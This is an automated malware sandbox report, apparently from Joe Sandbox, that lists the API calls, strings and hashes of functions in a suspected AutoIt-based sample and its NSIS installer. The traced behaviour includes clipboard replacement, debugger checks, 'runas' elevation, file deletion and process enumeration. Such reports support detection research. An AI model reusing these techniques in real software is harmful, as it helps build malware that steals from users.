Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Climb.comPID: 6996, Parent PID: 6804COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 00A65FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A65FF7

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

GetCurrentProcess.KERNEL32(?,00AFDC2C,00000000,?,?), ref: 00A66123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00A6612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A66155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A66167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A66175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A6617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00A661A1

Strings

kernel32.dll, xrefs: 00A66150
|O, xrefs: 00AA50F7
GetNativeSystemInfo, xrefs: 00A66161

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 79abcf0e85c3ff9b58f74f1cdf8c68412598e098bdced35bfe95b64806eff573
Instruction ID: 4ac74cdae28523d730b54723cedc0c351a8b0ed33c52763b1c5d8b490be1a431
Opcode Fuzzy Hash: 79abcf0e85c3ff9b58f74f1cdf8c68412598e098bdced35bfe95b64806eff573
Instruction Fuzzy Hash: 4FA1803290A6D4DFC712CBB87C411AD7FB56B27300B2849A9D48197362DE7D4948CB7E

Function 05781000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000001), ref: 05781032
OpenClipboard.USER32(00000000), ref: 0578103C
GetClipboardData.USER32(0000000D), ref: 0578104C
GlobalLock.KERNEL32(00000000), ref: 0578105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05781090
GlobalLock.KERNEL32 ref: 057810A0
GlobalUnlock.KERNEL32 ref: 057810C1
EmptyClipboard.USER32 ref: 057810CB
SetClipboardData.USER32(0000000D), ref: 057810D6
GlobalFree.KERNEL32 ref: 057810E3
GlobalUnlock.KERNEL32(?), ref: 057810ED
CloseClipboard.USER32 ref: 057810F3
GetClipboardSequenceNumber.USER32 ref: 057810F9

Memory Dump Source

Source File: 0000000E.00000002.3577551352.0000000005781000.00000020.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true

Associated: 0000000E.00000002.3577531968.0000000005780000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.3577570911.0000000005782000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5780000_Climb.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 9e630ead2686799de628928419814eca76a050cf523d6e6a90063a34a051c084
Instruction ID: fd13a6dd428d1ba0ca5ccb7cbecc653cea03784e3ceeb142dd659aa97935b3ae
Opcode Fuzzy Hash: 9e630ead2686799de628928419814eca76a050cf523d6e6a90063a34a051c084
Instruction Fuzzy Hash: 8421C875698250DBD7203BB1AC0EB7A7FE9FF04742F548028F945D6552EF218801F7A1

Function 00A6338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A63368,?), ref: 00A633BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A63368,?), ref: 00A633CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00B32418,00B32400,?,?,?,?,?,?,00A63368,?), ref: 00A6343A

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

Part of subcall function 00A6425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A63462,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A642A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A634BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AA3CB0
SetCurrentDirectoryW.KERNEL32(?,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00AA3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B231F4,00B32418,?,?,?,?,?,?,?,00A63368), ref: 00AA3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00AA3D81

Part of subcall function 00A634D3: GetSysColorBrush.USER32(0000000F), ref: 00A634DE
Part of subcall function 00A634D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A634ED
Part of subcall function 00A634D3: LoadIconW.USER32(00000063), ref: 00A63503
Part of subcall function 00A634D3: LoadIconW.USER32(000000A4), ref: 00A63515
Part of subcall function 00A634D3: LoadIconW.USER32(000000A2), ref: 00A63527
Part of subcall function 00A634D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A6353F
Part of subcall function 00A634D3: RegisterClassExW.USER32(?), ref: 00A63590

Part of subcall function 00A635B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A635E1
Part of subcall function 00A635B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63602
Part of subcall function 00A635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A63616
Part of subcall function 00A635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A6361F

Part of subcall function 00A6396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63A3C

Strings

AutoIt, xrefs: 00AA3CA5
runas, xrefs: 00AA3D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AA3CAA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: a2a0a9dab6993293abd63aa26d0e1fe0406b482a5b1c212d22ed0cf110ef0208
Instruction ID: 3254f1f9b081f2161ecba1a884626dd041909e45286f71b3eb0cfbdb03b8cb32
Opcode Fuzzy Hash: a2a0a9dab6993293abd63aa26d0e1fe0406b482a5b1c212d22ed0cf110ef0208
Instruction Fuzzy Hash: AB51F932108340AECB06FFA0AD15DBEBBF99F95740F14052DF192571A2DF348A4AC762

Function 00ACDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871

Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00ACDCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ACDD2C
FindClose.KERNEL32(00000000), ref: 00ACDD43
FindClose.KERNEL32(00000000), ref: 00ACDD4C

Strings

\*.*, xrefs: 00ACDC9D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 262bd2fe274d2d8f052cf537780e5bb55c5a0f4b093601af156fd8e8c4e591d5
Instruction ID: 98adc45eb92b76ccd946a5eb3741a0b9cd379c40b9623babc11a9a07ebe3f91d
Opcode Fuzzy Hash: 262bd2fe274d2d8f052cf537780e5bb55c5a0f4b093601af156fd8e8c4e591d5
Instruction Fuzzy Hash: B2317E314193459FC302EF60D985DEFBBF8AE95304F404D6DF4D6821A1EB21DA0ACBA6

Function 00ACDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00ACDDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00ACDDBA
Process32NextW.KERNEL32(00000000,?), ref: 00ACDDDA
CloseHandle.KERNEL32(00000000), ref: 00ACDE87

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
